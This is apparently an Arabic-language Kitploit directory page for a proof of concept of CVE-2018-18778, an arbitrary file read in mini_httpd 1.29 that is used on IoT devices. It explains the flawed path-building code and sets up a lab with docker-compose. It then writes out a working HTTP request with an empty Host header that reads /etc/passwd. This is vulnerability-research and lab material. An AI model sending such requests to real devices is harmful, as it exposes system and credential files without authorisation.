Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Mini_httpd-CVE-2018-18778 — استغلال إثبات المفهوم لـ CVE-2018-18778: قراءة ملف تعسفية في mini_httpd 1.29 عبر رأس Host فارغ، مما يؤثر على أجهزة إنترنت الأشياء من Huawei، Zyxel، وغيرها. | Kitploit
أدوات/GitHubGitHub/cyberharsh/mini_httpd-cve-2018-18778
أمان الأنظمة المدمجةأمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالاختبار العشوائي
GitHubcyberharsh/mini_httpd-cve-2018-18778

Mini_httpd-CVE-2018-18778

استغلال إثبات المفهوم لـ CVE-2018-18778: قراءة ملف تعسفية في mini_httpd 1.29 عبر رأس Host فارغ، مما يؤثر على أجهزة إنترنت الأشياء من Huawei، Zyxel، وغيرها.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
37منذ 6 سنواتلم تتم المراجعة بعد

ثغرة قراءة الملفات العشوائية في mini_httpd (CVE-2018-18778)

Mini_httpd هو خادم HTTP مصغر، يمكنه الحفاظ على مستوى معين من الأداء (حوالي 90% من Apache) مع استهلاك موارد نظام صغيرة، لذلك يستخدم على نطاق واسع في مختلف أجهزة إنترنت الأشياء (الموجهات، المبدلات، الكاميرات، إلخ) كخادم مضمن. وقد استخدمت أجهزة من شركات مثل Huawei وZyxel وHikvision وRaspberry Pi وغيرها مكون mini_httpd.

عند تشغيل mini_httpd في وضع الاستضافة الافتراضية، يؤدي طلب المستخدم http://HOST/FILE إلى الوصول إلى ملف HOST/FILE في الدليل الحالي.

root@kitploit:~
(void) snprintf( vfile, sizeof(vfile), "%s/%s", req_hostname, f );

انظر إلى الكود أعلاه، التحليل كالتالي:

  • عندما يكون HOST=example.com و FILE=index.html، تكون نتيجة العبارة أعلاه example.com/index.html، ويتم قراءة الملف بشكل طبيعي.
  • عندما يكون HOST فارغًا و FILE=etc/passwd، تكون نتيجة العبارة أعلاه /etc/passwd.

يتم التعامل مع الأخير كمسار مطلق، وبالتالي يتم قراءة /etc/passwd، مما يؤدي إلى ثغرة قراءة ملف عشوائي.

إعداد البيئة

قم بتنفيذ الأمر التالي لبدء mini_httpd 1.29:

root@kitploit:~
docker-compose up -d

بعد بدء البيئة، قم بزيارة http://your-ip:8080 لرؤية صفحة الويب.

إعادة إنتاج الثغرة

أرسل الطلب مع تعيين Host فارغًا، وقيمة PATH هي المسار المطلق للملف:

root@kitploit:~
GET /etc/passwd HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close


تمت قراءة الملف بنجاح:

تنزيل الأداة